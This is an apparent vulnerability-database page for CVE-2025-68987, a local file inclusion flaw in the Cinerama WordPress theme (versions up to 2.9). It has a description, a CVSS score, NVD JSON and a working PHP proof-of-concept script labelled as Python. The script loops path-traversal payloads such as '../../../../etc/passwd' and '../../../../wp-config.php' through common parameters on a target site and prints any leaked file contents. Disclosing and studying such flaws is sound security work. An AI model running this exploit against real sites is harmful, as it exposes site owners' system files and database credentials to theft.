Security Vulnerability Report
中文
CVE-2025-68987 CVSS 7.5 HIGH

CVE-2025-68987

Published: 2025-12-30 11:15:57
Last Modified: 2026-04-27 19:16:40

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Cinerama cinerama allows PHP Local File Inclusion.This issue affects Cinerama: from n/a through <= 2.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cinerama <= 2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-68987 PoC - Cinerama Theme Local File Inclusion // Usage: php poc.php <target_url> [payload_file] $target = $argv[1] ?? ''; $payload_file = $argv[2] ?? null; if (empty($target)) { echo "Usage: php poc.php <target_url> [payload_file]\n"; echo "Example: php poc.php http://victim.com/wp-content/themes/cinerama/ ../../../../etc/passwd\n"; exit(1); } // Default LFI payloads $payloads = [ '../../../../etc/passwd', '../../../../wp-config.php', '../../../../../../etc/passwd', '../../../../../wp-config.php' ]; // Common vulnerable parameters $params = ['template', 'file', 'page', 'theme', 'style', 'p']; echo "[*] CVE-2025-68987 Local File Inclusion PoC\n"; echo "[*] Target: $target\n\n"; foreach ($params as $param) { foreach ($payloads as $payload) { $url = $target . '?' . $param . '=' . urlencode($payload); echo "[*] Testing: $url\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && (strpos($response, 'root:') !== false || strpos($response, 'DB_NAME') !== false)) { echo "[!] VULNERABLE! File content leaked:\n"; echo $response . "\n"; exit(0); } } } echo "[*] No obvious LFI detected with basic payloads\n"; echo "[*] Manual testing recommended with different parameter names\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68987", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:57.330", "lastModified": "2026-04-27T19:16:39.820", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Cinerama cinerama allows PHP Local File Inclusion.This issue affects Cinerama: from n/a through <= 2.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/cinerama/vulnerability/wordpress-cinerama-a-wordpress-theme-for-movie-studios-and-filmmakers-theme-2-4-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}